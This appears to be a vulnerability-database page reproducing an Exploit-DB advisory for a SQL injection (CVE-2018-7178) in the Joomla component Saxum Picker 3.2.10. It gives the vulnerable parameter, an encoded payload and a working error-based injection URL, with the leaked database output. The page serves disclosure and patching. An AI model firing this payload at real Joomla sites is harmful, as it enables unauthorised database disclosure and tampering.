header-logo
Suggest Exploit
vendor:
Saxum Picker
by:
Ihsan Sencan
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Saxum Picker
Affected Version From: 3.2.10
Affected Version To: 3.2.10
Patch Exists: YES
Related CWE: CVE-2018-7178
CPE: a:saxum2003:saxum_picker:3.2.10
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

Joomla! Component Saxum Picker 3.2.10 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component Saxum Picker 3.2.10. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the affected parameter. This can be exploited to disclose the content of the back-end database, modify data, or exploit further vulnerabilities.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version of the software.
Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component Saxum Picker 3.2.10 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://www.saxum2003.hu/
# Software Link: https://extensions.joomla.org/extensions/extension/sports-a-games/games/saxumpicker/
# Software Download: http://www.saxum2003.hu/downloadsen/file/97-picker32.html
# Version: 3.2.10
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-7178
# # # # # 
# Exploit Author: Ihsan Sencan
# # # # #
# 
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_saxumpicker&view=savedspread&publicid=[SQL]
# 
# JTMxJTI3JTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTM2JTM2JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTI5JTI5JTJkJTJkJTIwJTJk
# 
# # # # #





http://localhost/Joomla375/index.php?option=com_saxumpicker&view=savedspread&publicid=1' AND EXTRACTVALUE(66,CONCAT(0x5c,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1)))))-- -
1105 XPATH syntax error: '\root@localhost : joomla375 : 10'